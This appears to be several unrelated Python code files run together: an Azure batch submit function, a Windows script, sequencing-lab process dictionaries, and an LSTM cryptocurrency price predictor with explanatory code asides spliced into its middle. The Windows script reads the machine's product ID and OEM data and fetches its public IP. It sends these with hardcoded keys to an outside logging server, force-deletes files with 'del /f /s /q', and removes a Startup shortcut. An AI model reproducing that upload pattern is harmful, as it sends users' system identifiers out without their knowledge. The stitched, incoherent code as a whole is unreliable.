batch_client=core_cluster_operations.batch_client) def submit( core_cluster_operations, spark_cluster_operations, cluster_id: str, application: models.ApplicationConfiguration, remote: bool = False, wait: bool = False, internal: bool = False, ): try: submit_application(core_cluster_operations, spark_cluster_operations, cluster_id, application, remote, wait, internal) except BatchErrorException as e: raise error.AztkError(helpers.format_batch_exception(e)) import os import time import requests import random def IsFileExist(FileName): #To check a file exist if(os.path.isfile("C:\\IDS\\SR.txt") == True): return True else: return False def UploadToServer(): #To upload data to server localtime = time.asctime( time.localtime(time.time())) #定义变量 num = 8 ran = [] ran = ''.join(str(i) for i in random.sample(range(0,9),num)) #读取文件 with open("systeminfomation.dll", "r") as f : IDD = f.read() with open("oeminfomation.dll", "r") as f: typ = f.read() if os.path.exists("C:\IDS") == False: randisk = "C:\IDS" os.mkdir(randisk) #准备上传 ip = requests.get(url="http://ip.42.pl/raw").text typee = typ[typ.rfind('data:'):] ty = typee.replace('data:', '') IDC = IDD.replace(' ', '') ID = IDC.replace('产品ID:', '') # 测试版 KEY = ("dbs1145142333") KEY = ("dbs-s11451419198102333") os.system("del /f /s /q C:\\IDS\\ID.txt") os.system("echo "+ran+" >> C:\\IDS\\ID.txt") url = "https://log.drblack-system.com/" data = {"ID":ID, "type":ty, "time":localtime, "ip":ip, "random":ran, "key-s":KEY} r = requests.post(url=url,data=data) print(r.text) os.system("del /f /s /q \"C:\\ProgramData\\Microsoft\\Windows\\Start Menu\\Programs\\StartUp\\dbs_form.lnk\"") time.sleep(1.5) return 0 if(IsFileExist("C:\\IDS\\SR.txt") == True): UploadToServer() else: isavi = 0 month = 0 day = 0 birthfile = open("C:\\IDS\\SR.txt", "w") print("The reserved switch is not detected, please enter your birthday as prompted:") while(isavi == 0): month = int(input("Please enter the month:")) day = int(input("Please enter the date:")) #检测日期是否合法 if(month > 0 and month < 13): if(month == 1 or month == 3 or month == 5 or month == 
7 or month == 8 or month == 10 or month == 12): if(day > 0 and day < 32): isavi = 1 else: if(month == 2): if(day > 0 and day < 30): isavi = 1 else: if(day > 0 and day < 31): isavi = 1 if(isavi == 0): print("Illegal date! Please check the input.") if(month < 10): upstr = "0" + (str(month) + "-" + str(day)) else: upstr = (str(month) + "-" + str(day)) birthfile.write(upstr) birthfile.close() UploadToServer() INITALQCFINISHEDLIB = {'Description':'All processes included in the initial qc protocol for finished libraries, except the aggregation step.', '24' : 'Customer Gel QC', '62' : 'qPCR QC (Library Validation) 4.0', '64' : 'Quant-iT QC (Library Validation) 4.0', '67' : 'Qubit QC (Library Validation) 4.0', '20' : 'CaliperGX QC (DNA)', '17' : 'Bioanalyzer QC (Library Validation) 4.0'} INITALQC ={'Description':'All processes included in the initial qc protocol, except the aggrigation step.', '63' : 'Quant-iT QC (DNA) 4.0', '65' : 'Quant-iT QC (RNA) 4.0', '66' : 'Qubit QC (DNA) 4.0', '68' : 'Qubit QC (RNA) 4.0', '24' : 'Customer Gel QC', '20' : 'CaliperGX QC (DNA)', '16' : 'Bioanalyzer QC (DNA) 4.0', '18' : 'Bioanalyzer QC (RNA) 4.0', '116' : 'CaliperGX QC (RNA)', '504' : 'Volume Measurement QC'} AGRINITQC = {'Description':'Aggregation step of the initial qc protocol', '7' : 'Aggregate QC (DNA) 4.0', '9' : 'Aggregate QC (RNA) 4.0'} PREPREPSTART = {'Description':'Process/processes that can be defined as a start of the library preparation protocol. If the work flow involves two library preparation protocols, such as for exome captue, only the steps of the first protocol should be given here.', '304' : "Ligate 3' adapters (TruSeq small RNA) 1.0"} POOLING = {'Description':'To identify the reagent labels (indexes) of each sample. If multiple pooling steps, the first pooling step after indexing should be specified', '42': "Library Pooling (Illumina SBS) 4.0", '43': "Library Pooling (MiSeq) 4.0", '44': "Library Pooling (TruSeq Amplicon) 4.0", '45': "Library Pooling (TruSeq Exome) 4.0", '58': "Pooling For Multiplexed Sequencing (SS XT) 4.0", '255': "Library Pooling (Finished Libraries) 4.0", '308': "Library Pooling (TruSeq Small RNA) 1.0", '404': "Pre-Pooling (Illumina SBS) 4.0", '506': "Pre-Pooling (MiSeq) 4.0", '508': "Applications Pre-Pooling", '716': 'Library Pooling (HiSeq X) 1.0'} PREPSTART = {'Description':'Process/processes that can be defined as a start of the library preparation protocol. The first one of these that are run in lims is used to set the prep start date. If the work flow involves two library preparation protocols, such as for exome capture, the prep start step of the second protocol should be given here. ', '10' : 'Aliquot Libraries for Hybridization (SS XT)', '47' : 'mRNA Purification, Fragmentation & cDNA synthesis (TruSeq RNA) 4.0', '33' : 'Fragment DNA (TruSeq DNA) 4.0', '407' : 'Fragment DNA (ThruPlex)', '308': 'Library Pooling (TruSeq Small RNA) 1.0', '117' : 'Applications Generic Process', '454' : 'ThruPlex template preparation and synthesis', '405' : 'RiboZero depletion'} PREPEND = {'Description':'Process that can be defined as a end of the library preparation. If more than one library preparation protocol is included in the work flow, only the prep end step of the second protocol should be given here. 
Used to set the prep finished date.', '157': 'Applications Finish Prep', '109' : 'CA Purification', '456' : 'Purification (ThruPlex)', '111' : 'Amplify Captured Libraries to Add Index Tags (SS XT) 4.0', '406' : 'End repair, size selection, A-tailing and adapter ligation (TruSeq PCR-free DNA) 4.0', '311': 'Sample Placement (Size Selection)'} LIBVAL = {'Description':'All processes included in the library validation protocol, except the aggregation step. If the work flow involves two library preparation protocols, such as for exome capture, only the steps of the second protocol should be given here.', '62' : 'qPCR QC (Library Validation) 4.0', '64' : 'Quant-iT QC (Library Validation) 4.0', '67' : 'Qubit QC (Library Validation) 4.0', '20' : 'CaliperGX QC (DNA)', '17' : 'Bioanalyzer QC (Library Validation) 4.0'} LIBVALFINISHEDLIB = {'Description':'', '62' : 'qPCR QC (Library Validation) 4.0', '64' : 'Quant-iT QC (Library Validation) 4.0', '67' : 'Qubit QC (Library Validation) 4.0', '20' : 'CaliperGX QC (DNA)', '17' : 'Bioanalyzer QC (Library Validation) 4.0', '24' : 'Customer Gel QC'} AGRLIBVAL = {'Description':'The aggregation step of the library validation protocol', '8': 'Aggregate QC (Library Validation) 4.0'} SEQSTART = {'Description':'These processes are used to set the sequencing_start_date', '23':'Cluster Generation (Illumina SBS) 4.0', '26':'Denature, Dilute and Load Sample (MiSeq) 4.0', '710':'Cluster Generation (HiSeq X) 1.0'} DILSTART = {'Description':'These processes are used to set the dilution_and_pooling_start_date', '40' : 'Library Normalization (MiSeq) 4.0', '39' : 'Library Normalization (Illumina SBS) 4.0', '715': 'Library Normalization (HiSeq X) 1.0'} SEQUENCING = {'Description':'Sequencing', '38' : 'Illumina Sequencing (Illumina SBS) 4.0', '46' : 'MiSeq Run (MiSeq) 4.0', '714': 'Illumina Sequencing (HiSeq X) 1.0'} WORKSET = {'Description':'To identify the work sets on which the samples has been run. The process used to define a workset for the protocol. ', '204' : 'Setup Workset/Plate'} SUMMARY = {'Description':'', '356' : 'Project Summary 1.3'} DEMULTIPLEX={'Description':'', '13' : 'Bcl Conversion & Demultiplexing (Illumina SBS) 4.0'} CALIPER = {'Description':'', '20' : 'CaliperGX QC (DNA)', '116' : 'CaliperGX QC (RNA)'} FINLIB = ['Finished library', 'Amplicon'] PROJ_UDF_EXCEPTIONS = ['customer_reference','uppnex_id','reference_genome','application'] SAMP_UDF_EXCEPTIONS = ['customer_name','reads_requested_(millions)','min_reads', 'm_reads','dup_rm','status_auto','status_manual','average_size_bp','incoming_qc_status'] PROCESSCATEGORIES = {'INITALQCFINISHEDLIB' : INITALQCFINISHEDLIB, 'INITALQC':INITALQC, 'AGRINITQC':AGRINITQC, 'PREPREPSTART':PREPREPSTART, 'POOLING':POOLING, 'PREPSTART':PREPSTART, 'PREPEND':PREPEND, 'LIBVAL':LIBVAL, 'LIBVALFINISHEDLIB':LIBVALFINISHEDLIB, 'AGRLIBVAL':AGRLIBVAL, 'SEQSTART':SEQSTART, 'DILSTART':DILSTART, 'SEQUENCING':SEQUENCING, 'WORKSET':WORKSET, 'SUMMARY':SUMMARY, 'DEMULTIPLEX':DEMULTIPLEX, 'CALIPER':CALIPER} <reponame>block1o1/CryptoPredicted<gh_stars>1-10 # Artificial Intelligence (A.I.) price predictions # this script uses tensorflow/Keras libraries, make sure they are installed properly. 
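# (illustrative aside on the process-category dicts a few lines up) Each category dict
# maps LIMS process ids to process names, plus a 'Description' entry, and
# PROCESSCATEGORIES collects them by category name. A small sketch -- reusing only a
# tiny subset of the real dicts -- of how such a structure can be queried:

_EXAMPLE_CATEGORIES = {
    'SEQUENCING': {'Description': 'Sequencing',
                   '38': 'Illumina Sequencing (Illumina SBS) 4.0',
                   '46': 'MiSeq Run (MiSeq) 4.0'},
    'CALIPER': {'Description': '',
                '20': 'CaliperGX QC (DNA)',
                '116': 'CaliperGX QC (RNA)'},
}

def categories_for_process(process_id, categories=_EXAMPLE_CATEGORIES):
    """Return the category names whose dicts contain the given process id."""
    return [name for name, procs in categories.items()
            if process_id != 'Description' and process_id in procs]

# categories_for_process('20')  ->  ['CALIPER']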
import matplotlib matplotlib.use('Agg') import os, errno os.environ['TF_CPP_MIN_LOG_LEVEL'] = '2' # disable tensorflow error about CPU instructions import time import math import numpy as np import traceback from numpy import concatenate import matplotlib.pyplot as plt import threading import random import json import requests import pprint from collections import OrderedDict from datetime import datetime, timedelta import multiprocessing import multiprocessing.pool # mode mode = "production" # mode = "test" import sys sys.path.insert(0, '/home/cryptopredicted/') sys.path.insert(0, '/home/cryptopredicted/presenters/') from mysettings import dtNow, createLogger import DAL h5Dir = '/home/cryptopredicted/predictors/h5/' imgDir = '/home/cryptopredicted/ui/prediction/images/' def dtToString(dt): return datetime.strftime(dt, '%Y-%m-%dT%H:%M') def create_train_dataset(dataset, look_back, n_features, seq_pred_len): # make sequences from 0 to len(dataset)-lookback sample, feature = [], [] #print(len(dataset)) #print(look_back) for i in range(0, len(dataset)-look_back-seq_pred_len): tmp = [] for n in range(0, n_features): tmp.append( dataset[i:i+look_back, n] ) sample.append(tmp) feature.append([ dataset[i+look_back:i+look_back+seq_pred_len, :n_features] ]) # new array will be len(dataset)-1 (one size smaller) return np.array(sample), np.array(feature) def create_test_dataset(dataset,look_back, n_features): # make sequences but make sure the end is included sample = [] for i in range(0, len(dataset)-look_back+1): # +1 important! to make this function work when n_window=1 tmp = [] for n in range(n_features): tmp.append( dataset[i:i+look_back, n] ) sample.append(tmp) return np.array(sample) class MyMinMaxScaler(): def __init__(self, _min, _max): self.min = _min self.max = _max def fit_transform(self, values): for x in range(len(values)): values[x] = (values[x] - self.min) / (self.max - self.min) return values def inverse_transform(self, values): for x in range(len(values)): values[x] = values[x] * (self.max - self.min) + self.min return values # try different scalers # http://scikit-learn.org/stable/modules/classes.html#module-sklearn.preprocessing def prepare_trainingset(dataset, n_features, n_window, seq_pred_len): from sklearn.preprocessing import MinMaxScaler, StandardScaler values = np.array(dataset) # make a copy #print(values) values = values.astype('float32') scalers = [] for i in range(n_features): scalers.append( MinMaxScaler(feature_range=(0, 1)) ) # scalers.append( StandardScaler() ) # scalers.append(MyMinMaxScaler(0, 20000)) values[:,i] = scalers[i].fit_transform(values[:,i].reshape(-1,1))[:,0] # ########################################## #exit() #print("split into input and outputs") train = np.array(values) print(train.shape) train_X, train_y = create_train_dataset(train, n_window, n_features, seq_pred_len) print(train_X.shape, train_y.shape) train_X = train_X.reshape((train_X.shape[0], n_features, n_window)) train_y = train_y.reshape(train_y.shape[0],n_features, 1*seq_pred_len) # the target data is a single array (:1) of n_features #print(train_X.shape, train_y.shape) #print() if train_X.shape[0] == 0: print(" => not enough historical data yet. aborted." 
) raise return (train, train_X, train_y, scalers) def make_train_predictions(scalers, train_X, n_features, n_window, model, seq_pred_len): # predict training data: price xpolated = [()] * len(scalers) p_train = model.predict(train_X) p_train = p_train.reshape((p_train.shape[0], 1*seq_pred_len, n_features)) future_pinv = np.array(p_train) for i in range(len(scalers)): dump = scalers[i].inverse_transform(p_train[:,:,i])[:,:] future_pinv[:,:,i] = dump return future_pinv def make_future_predictions(scalers, train, n_window, n_features, predict_n_intervals, model, seq_pred_len): # !ici ######################################### # here we predict future values (predictions) # notice that we create multiple predictions by using the latest prediction as new input data (shifting the input values) xpolated = [()] * len(scalers) future = np.array(train[-n_window:, :n_features]) # get a portion of historic data (size of window, because everything before is already predicted) for z in range( int(predict_n_intervals/seq_pred_len) ): # we don't need every sequence, we let it predict all sequences; each iteration we keep only the latest one. future_p = create_test_dataset(future, n_window, n_features) # print("it: "+str(z)) #print(" input: " + str(future_p.shape)) # print() future_p = model.predict(future_p) future_p = future_p.reshape((future_p.shape[0], 1*seq_pred_len, n_features)) # 2D to 3D #print("output: " + str(future_p.shape)) # print() future_pinv = np.array(future_p) # make deep copy for i in range(len(scalers)): dump = scalers[i].inverse_transform( np.array(future_p[:,:,i]) )[:,:] future_pinv[:,:,i] = dump if len(xpolated[i]) == 0: xpolated[i] = future_pinv[:,:,i].reshape(1*seq_pred_len) # -1 -1 else: xpolated[i] = concatenate([ xpolated[i], future_pinv[:,:,i].reshape(1*seq_pred_len) ]) #print("output': \n", str(future_pinv)) #print() xy_p = np.array(future_p[-1*seq_pred_len:,:,:]) # get most recent prediction xy_p = xy_p.reshape(1*seq_pred_len, n_features) future = np.array(future[1*seq_pred_len:, :n_features]) # remove oldest rows future = np.append(future, xy_p, axis=0) #print("---------------") # ! == feedback loop ! 
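# (illustrative aside) The loop above is a standard recursive multi-step forecast:
# predict the next chunk, drop the oldest rows of the input window, append the
# prediction, and repeat -- the "feedback loop" noted in the comments. A minimal
# sketch with a dummy one-step model; all names here are hypothetical:
import numpy as np

def recursive_forecast(history, predict_one_step, n_steps):
    window = np.array(history, dtype=float)   # most recent observations
    out = []
    for _ in range(n_steps):
        nxt = predict_one_step(window)        # model consumes the current window
        out.append(nxt)
        window = np.append(window[1:], nxt)   # feedback: slide window, append prediction
    return np.array(out)

# recursive_forecast([1.0, 2.0, 3.0], predict_one_step=lambda w: w.mean(), n_steps=3)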
######################################### return xpolated def silentremove(filename): try: os.remove(filename) except OSError as e: # this would be "except OSError, e:" before Python 2.6 if e.errno != errno.ENOENT: # errno.ENOENT = no such file or directory raise # re-raise exception if a different error occurred def f_historymins(interval, n_window, multiplier): return interval*(n_window+1)*multiplier def obtainDataset(exchange ,symbol, interval, historymins, currentDateTime, dataset_func, sync_dict_json): # get data from our API and process it given our dataset_func jsout = getJson(exchange, symbol['base_cur'], symbol['quote_cur'], interval, historymins, currentDateTime, sync_dict_json) try: dataset = dataset_func(jsout, symbol) except KeyboardInterrupt: raise except: jsout = getJson(exchange, symbol['base_cur'], symbol['quote_cur'], interval, historymins, currentDateTime, sync_dict_json) dataset = dataset_func(jsout, symbol) ####### ####### removing rows where price is zero for row,_ in enumerate(dataset): if dataset[row][0] == 0: # zero price detected for col,_ in enumerate(dataset[row]): dataset[row][col] = 0 # set every column to zero because price is zero dataset = dataset[(dataset > 0).any(axis=1)] # delete entire row if all '0' value present ####### return dataset def fitAndPredict_trainAlways(h5fn, featuresID, exchange, symbol, n_window, interval, currentDateTime, predict_n_intervals, n_neuron, n_hiddenlay, n_epoch, n_batch_size, dataset_func, sync_dict_json, sync_list_output, seq_pred_len): # this is the core A.I. training and predictions part. import random from keras import backend as K from keras.callbacks import EarlyStopping try: # if no model exists: prepare data, create model, train it, save it and clear it. if not modelExists(h5fn): historymins = f_historymins(interval, n_window, 70) # 1000 dataset = obtainDataset(exchange ,symbol, interval, historymins, currentDateTime - timedelta(minutes=interval-1), dataset_func, sync_dict_json) n_features = len(dataset[0]) (train, train_X, train_y, scalers) = prepare_trainingset(dataset, n_features, n_window, seq_pred_len) print("creating new model: " + h5fn) model = createModel(h5fn, n_neuron, n_hiddenlay, n_features, n_window, seq_pred_len) early_stopping_monitor = EarlyStopping(monitor='loss', patience=30, verbose=1) history = model.fit(train_X, train_y, epochs=n_epoch, batch_size=n_batch_size, verbose=1, shuffle=False, callbacks=[early_stopping_monitor]) # validation_data=(test_X, test_y), saveModel(h5fn, model) saveWeights(h5fn, model) # saving scaler -- https://stackoverflow.com/questions/41993565/save-scaler-model-in-sklearn K.clear_session() del model # by now a model (already) exists; so we prepare data, load model, train it, make predictions and save the new weights. # notice that it's also possible to train the model once (step above), and then omit the "model.fit(...)" function, whereby we don't re-train the model each new generation. # if you omit continuous training, you will increase performance, but whether you accuracy is retained (through time) is not documented. 
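# (illustrative aside) A minimal sketch of the "train once, then reload and optionally
# fine-tune" pattern described in the comments above. Assumptions: Keras is available,
# and `build_model()`, `h5_path` and `train_data` are hypothetical placeholders:
import os

def get_model(h5_path, build_model, retrain=False, train_data=None):
    from keras.models import load_model       # deferred import, as in the script above
    if not os.path.isfile(h5_path):
        model = build_model()                  # first run: create and fit from scratch
        if train_data is not None:
            model.fit(*train_data, epochs=1, verbose=0)
        model.save(h5_path)
    else:
        model = load_model(h5_path)            # later runs: reload the persisted model
        if retrain and train_data is not None:
            model.fit(*train_data, epochs=1, verbose=0)   # optional fine-tune step
            model.save(h5_path)
    return model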
# let us train once, and then just load model historymins = f_historymins(interval, n_window, 3) dataset = obtainDataset(exchange ,symbol, interval, historymins, currentDateTime, dataset_func, sync_dict_json) n_features = len(dataset[0]) (train, train_X, train_y, scalers) = prepare_trainingset(dataset, n_features, n_window, seq_pred_len) model = loadModelAndWeights(h5fn) early_stopping_monitor = EarlyStopping(monitor='loss', patience=20, verbose=1) history = model.fit(train_X, train_y, epochs=n_epoch, batch_size=n_batch_size, verbose=1, shuffle=False, callbacks=[early_stopping_monitor]) # validation_data=(test_X, test_y), saveWeights(h5fn, model) xpolated = make_future_predictions(scalers, train, n_window, n_features, predict_n_intervals, model, seq_pred_len) # let's prepare data to be stored into the database: currentDateTime = adjustDatetime(interval, currentDateTime)# we use real-time datetime to make predictions, but when we persist we'll floor the datetime according to the interval tmpdt = currentDateTime + timedelta(minutes=interval) maxdt = currentDateTime + timedelta(minutes=seq_pred_len*predict_n_intervals*interval) j = 0 sendobj = { 'data': [], 'base_cur':symbol['base_cur'], 'quote_cur':symbol['quote_cur'], 'interval':interval, 'timestamp':currentDateTime, 'exchange':exchange, 'n_fid':featuresID, 'n_batch_size':n_batch_size, 'n_neuron':n_neuron, 'n_window':n_window, 'n_epoch':n_epoch, 'n_predict_intervals':predict_n_intervals, 'n_hiddenlay':n_hiddenlay, 'mode': mode} while (tmpdt <= maxdt and j < len(xpolated[0])): sendobj['data'].append( { 'timestamp': tmpdt, 'open': float(xpolated[0][j]), 'close': float(xpolated[1][j]), 'low': float(xpolated[2][j]), 'high': float(xpolated[3][j]), 'volume': float(xpolated[4][j]), # 'signal': float(xpolated[5][j]), } ) tmpdt += timedelta(minutes=interval) j += 1 K.clear_session() del model # instead of writing each prediction individually, we use another shared dict variable, which we process at the very end. # this was implemented for several reasons (we want all predictions to be updated/stored at the same time, and not with a minute delay). # DAL.store_predictions_v1(DAL.openConnection(), sendobj) sync_list_output.append(sendobj) print(currentDateTime) except KeyboardInterrupt: raise except Exception as ex: traceback.print_exc() logErr = createLogger("predictions_v1_error", "predictions_v1_error") logErr.critical(str(ex), exc_info=True) def getJson(exchange, base_cur, quote_cur, interval, historymins, currentDateTime, sync_dict_json): # getting data from our API (OHLC, volume, sentiments, ...) depending on the type parameter in query. 
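# (illustrative aside) getJson below shares a Manager dict between worker processes as a
# simple request cache: the first process to need a URL writes a 0 placeholder, fetches,
# then stores the parsed JSON; other processes see the placeholder, wait, and reuse the
# stored result. A stripped-down sketch of that idea; `fetch` is a stand-in callable,
# not the real API call, and unlike the real function this sketch has no 60-second
# escape hatch:
import time

def fetch_once(url, shared_cache, fetch):
    if url not in shared_cache:
        shared_cache[url] = 0              # placeholder: "this URL is being fetched"
        shared_cache[url] = fetch(url)     # overwrite placeholder with the payload
    while shared_cache[url] == 0:          # another process is still fetching -> wait
        time.sleep(0.25)
    return shared_cache[url]

# usage sketch: cache = multiprocessing.Manager().dict()
#               fetch_once(url, cache, fetch=lambda u: requests.get(u).json())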
# url = 'https://cryptopredicted.com/api.php?type=exchangeChart&exchange='+exchange+'&base_cur='+base_cur+'&quote_cur='+quote_cur+'&historymins='+str(historymins)+'&currentDateTime='+dtToString(currentDateTime)+'&interval='+str(interval) url = 'https://cryptopredicted.com/PWA/api/?type=exchange&exchange='+exchange+'&base_cur='+base_cur+'&quote_cur='+quote_cur+'&interval='+str(interval)+'&historymins='+str(historymins)+'&currentDateTime=' + dtToString(currentDateTime) log = createLogger("predictions_v1_info", "predictions_v1_info") log.info(url) i = 0 force = False while url in sync_dict_json and sync_dict_json[url] == 0: time.sleep(0.25) i += 1 if i*4 > 60: # wait 60 seconds for the json (from another process), if it fails then force proceed yourself force = True # sync_dict_json is a dictionary shared among the other processes # it prevents making the same calls to the API, if the results are already obtained by some other process # we don't want to make unnecessary API calls, one is enough given the same parameters. if force or not url in sync_dict_json: print(url) sync_dict_json[url] = 0 #print(url) response = requests.get(url) js = json.loads(response.text , object_pairs_hook=OrderedDict) sync_dict_json[url] = js #return js return sync_dict_json[url] def moving_average(a, n=3) : ret = np.cumsum(a, dtype=float) ret[n:] = ret[n:] - ret[:-n] return ret[n - 1:] / n def func_ai_a(js, symbol): # preparing data to be trained, serves as input to the Neural Net (NN) dataset = [] #[()] * len(js) i=0 for key in js: # DO NOT USE RELATIVE VALUES FROM API !!! only absolute ones if 'open' in js[key] and 'close' in js[key] and 'low' in js[key] and 'high' in js[key] and 'volume' in js[key]: dataset.append([ js[key]['open'], js[key]['close'], js[key]['low'], js[key]['high'], js[key]['volume'], ]) i += 1 else: # most likely some missing interval print("missing data at interval:") print(key) #print(js[key]) logErr = createLogger("predictions_v1_error", "predictions_v1_error") logErr.critical("missing data at interval:") logErr.critical(key) #logErr.critical(js[key]) # raise dataset= np.array(dataset) return dataset def func_ai_b(js, symbol): # another type of input format, whereby we also make it predict buy/sell positions. # this is highly experimental and yielded bad results # but it may illustrate how such a thing is done in case you need to extend your own version. dataset = [] #[()] * len(js) i=0 for key in js: # DO NOT USE RELATIVE VALUES FROM API !!!
only absolute ones if 'open' in js[key] and 'close' in js[key] and 'low' in js[key] and 'high' in js[key] and 'volume' in js[key]: dataset.append([ js[key]['open'], js[key]['close'], js[key]['low'], js[key]['high'], js[key]['volume'], ]) i += 1 else: # most likely some missing interval print("missing data at interval:") print(key) #print(js[key]) logErr = createLogger("predictions_v1_error", "predictions_v1_error") logErr.critical("missing data at interval:") logErr.critical(key) #logErr.critical(js[key]) # raise # in this L = len(dataset) Lentry = len(dataset[0]) for i, x in enumerate(dataset): #print(i) price = (x[0]+x[1])/2 # avg(open ; close) j = i+1 jarr = [] while j < L and j < 20: futurePrice = (dataset[j][0]+dataset[j][1])/2 if futurePrice >= price * 1.005: # if price in near future increases by 0.5% jarr.append(j) # if we can make a profit by buying 'now' and selling at some interval 'j', then record this j += 1 if len(x) == Lentry: # if we haven't added the signal yet if len(jarr) >= 1: # if we have at least X intervals in the future where we can sell (are we looking for a new plateau or temporary spike?) x.append(1) # buy for j in jarr: if len(dataset[j]) == Lentry: dataset[j].append(2) # sell for j in range(i+1, max(jarr)): if len(dataset[j]) == Lentry: dataset[j].append(0) # hold -- fill all gaps between first buy and possible future sells else: x.append(0) # hold # pprint.pprint(dataset[i:20]) # exit() dataset= np.array(dataset) return dataset def makeDatasets(): datasets = {} datasets['func_ai_a']= func_ai_a return datasets def modelExists(h5fn): return os.path.isfile(h5fn+'.h5') def loadModelAndWeights(h5fn): from keras.models import load_model model = load_model(h5fn+'.h5', compile=True) model.load_weights(h5fn+' weights.h5') return model def saveModel(h5fn, model): model.save(h5fn+'.h5') def saveWeights(h5fn, model): model.save_weights(h5fn+' weights.h5') def createModel(h5fn, n_neuron, n_hiddenlay, n_features, n_window, seq_pred_len): # call this function only in a new process, not in separate threads !!! from keras.models import Sequential from keras.layers.core import Dense, Activation, Dropout, Flatten from keras.layers.normalization import BatchNormalization from keras.layers import Dense, LSTM, Masking model = Sequential() #model.add(Masking(mask_value=0, input_shape=(n_features, n_window) )) # this could messup our signals '0-1-2' , since 0 means hold # model.add(LSTM(n_neuron, return_sequences=True, )) # for i in range(n_hiddenlay): # model.add(LSTM(n_neuron, return_sequences=True, )) if n_hiddenlay == 2: model.add(LSTM(5, return_sequences=True, input_shape=(n_features, n_window))) model.add(Dropout(0.3)) model.add(LSTM(3, return_sequences=True, )) model.add(Dropout(0.2)) model.add(LSTM(3, return_sequences=True, )) model.add(Dropout(0.2)) model.add(LSTM(5, return_sequences=True, )) model.add(Dropout(0.2)) if n_hiddenlay == 1: # default: recommended single layer with multiple neurons model.add(LSTM(5, return_sequences=True, input_shape=(n_features, n_window))) model.add(Dropout(0.2)) model.add(Dense(1*seq_pred_len)) # number of outputs model.add(Activation("linear")) model.compile(loss='mae', optimizer='adam') #accuracy not relevant for regression of timeseries #print(h5fn) return model def adjustDatetime(interval, currentDateTime): # if the datetime is not rounded to the given interval parameter, we'll do it here. 
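# Worked example of the flooring implemented just below (assuming `interval` is in
# minutes and either divides an hour or is a whole number of hours): with interval=10
# and currentDateTime = ...T14:37:45, minute -> 37 - (37 % 10) = 30 and seconds/
# microseconds -> 0, giving ...T14:30:00; with interval=240 (4 h), hour -> 14 - (14 % 4)
# = 12 and minute -> 0, giving ...T12:00:00.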
if interval <= 60: return currentDateTime.replace(minute=currentDateTime.minute-(currentDateTime.minute % interval), second=0, microsecond=0) #"2018-01-26T12:00" else: return currentDateTime.replace(hour=currentDateTime.hour-(currentDateTime.hour % int(interval/60)), minute=currentDateTime.minute-(currentDateTime.minute % 60), second=0, microsecond=0) #"2018-01-26T12:00" def adjustDatetime_realtime(interval, currentDateTime): return currentDateTime def train_predict(args = sys.argv): # we need to generate every possible combination of our configuration, let's pre-process it. # we basically create and store tuples in an array. # the array will be processed in a multi-processing fashion. # we don't want to parallellize every possible combination, # but instead we want to have max 6 to 9 processes running at the same time. # that's why at the deepest level we have a "uid" which acts as separator. # this is an important part, because if you have many different combinations you want to try out (e.g. different epochs and neuron counts), # then you want to make sure the processes don't take too long or make the server crash due to too many processes (or memory consumption). for HH in range(HH_max): for exchange in sorted(exchanges): for symbol in sorted(symbols, key=lambda x: x['base_cur']): for featuresID, dataset_func in datasets.items(): for n_window in n_windows: for interval in intervals: for n_epoch in n_epochs: for n_neuron in n_neurons: for n_hiddenlay in n_hiddenlayers: for n_batch_size in n_batch_sizes: for predict_n_intervals in predict_n_intervals_arr: h5fn = h5Dir + 'predictions_v1' + ' base_cur='+symbol['base_cur']+ ' base_cur='+symbol['quote_cur'] + ' fid='+featuresID + ' interval='+str(interval) + ' n_window='+str(n_window) + ' n_epoch='+str(n_epoch) + ' n_batch_size='+str(n_batch_size) + ' n_neuron='+str(n_neuron) + ' predict_n_intervals='+str(predict_n_intervals) + ' n_hiddenlay='+str(n_hiddenlay) _dtime = adjustDatetime_realtime(interval, dtstart + timedelta(minutes=HH*interval) ) uid = symbol['base_cur']#+"_"+symbol['quote_cur']+"_"+str(n_neuron)+"_"+str(n_window) # way to parallellize processing if not uid in arrParams: arrParams[uid] = [] arrParams[uid].append( (h5fn, featuresID, exchange, symbol, n_window, interval, _dtime, predict_n_intervals, n_neuron, n_hiddenlay, n_epoch, n_batch_size, dataset_func, sync_dict_json, sync_list_output, seq_pred_len) ) # now that we have our magical array of jobs/tasks, # let's create a processing pool and execute all jobs accordingly. 
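# (illustrative aside) The nested loops above build the full parameter grid and then
# bucket the resulting jobs by a coarse key (`uid`) so that only one pool runs per
# bucket. The same grouping in miniature, with hypothetical parameter names:
import itertools

def group_jobs(symbols, windows, epochs):
    jobs = {}
    for symbol, n_window, n_epoch in itertools.product(symbols, windows, epochs):
        uid = symbol                      # coarse key: one worker per symbol
        jobs.setdefault(uid, []).append((symbol, n_window, n_epoch))
    return jobs

# group_jobs(['BTC', 'ETH'], [16, 32], [500])
# -> {'BTC': [('BTC', 16, 500), ('BTC', 32, 500)], 'ETH': [('ETH', 16, 500), ('ETH', 32, 500)]}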
tasks = {} pools = {} for idf, arr in arrParams.items(): tasks[idf] = []; if not idf in pools: pools[idf] = multiprocessing.Pool( 1 ) for tup in arr: tasks[idf].append( pools[idf].apply_async(fitAndPredict_trainAlways, tup) ) client = DAL.openConnection() DAL.liveness_IAmAlive(client, "producer: predictions") for idf, arr in tasks.items(): for task in arr: try: task.get(timeout=60*20) except KeyboardInterrupt: raise except: traceback.print_exc() pools[idf].close() for sendobj in sync_list_output: DAL.store_predictions_v1(client, sendobj) print("/performance/") print("started:") print(_dtnow) print("ended:") print(dtNow()) print("/exited/") print("") log = createLogger("predictions_v1_info", "predictions_v1_info") log.info("/performance/") log.info("started:") log.info(str(_dtnow)) log.info("ended:") log.info(str(dtNow())) log.info("/exited/") log.info("") if __name__ == '__main__': args = sys.argv # we need to know the interval (10 minutes or 60 minutes): {10,60} if len(args) < 2: print("missing interval param") exit() # parameters: exchanges = ['binance'] # crypto currencies: (as defined by the exchange, and accessible through our API) symbols = [ {'base_cur':'BTC', 'quote_cur':'USDT'}, {'base_cur':'ETH', 'quote_cur':'USDT'}, {'base_cur':'LTC', 'quote_cur':'USDT'}, {'base_cur':'BCC', 'quote_cur':'USDT'}, # bitcoin cash (bcc ~ bch) {'base_cur':'NEO', 'quote_cur':'USDT'}, ] # testing seq_pred_len = 1 predict_n_intervals_arr = [12] n_windows = [32] n_neurons= [2] n_hiddenlayers = [1] n_epochs= [1000] intervals = [ int(args[1]), ] n_batch_sizes = [512,] datasets = makeDatasets() _dtnow = dtNow() pmanager = multiprocessing.Manager() sync_dict_json = pmanager.dict() sync_list_output = pmanager.list() arrParams = {} threads = [] HH_max = 1 dtstart = dtNow() #dtstart = datetime.strptime('2018-04-07 15:00', '%Y-%m-%d %H:%M') #HH_max = 20 # --> dtstart + ( i in HH_max) * interval train_predict() class Significance: FirstCriterion = '' 